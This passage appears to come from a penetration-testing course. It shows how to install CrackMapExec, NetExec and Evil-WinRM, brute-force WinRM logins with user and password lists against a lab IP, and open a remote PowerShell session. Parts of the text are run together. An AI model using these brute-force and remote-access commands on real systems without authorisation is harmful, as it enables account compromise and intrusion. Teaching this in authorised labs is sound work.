A handy tool that we can use for our password attacks is CrackMapExec, , which can also be used for other protocols such as SMB, LDAP, MSSQL, and others.
We recommend reading the official documentation for this tool to become familiar with it.
sudo apt-get -y install crackmapexec
we can install NetExec to follow along using sudo apt-get -y install netexec
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
Another handy tool that we can use to communicate with the WinRM service is Evil-WinRM, which allows us to communicate with the WinRM service efficiently.
sudo gem install evil-winrmevil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i 10.129.42.197 -u user -p password
If the login was successful, a terminal session is initialized using the Powershell Remoting Protocol (MS-PSRP), which simplifies the operation and execution of commands.
SSH) is a more secure way to connect to a remote host to execute system commands or transfer files from a host to a server.TCP port 22symmetric encryption, asymmetric encryption, and hashing.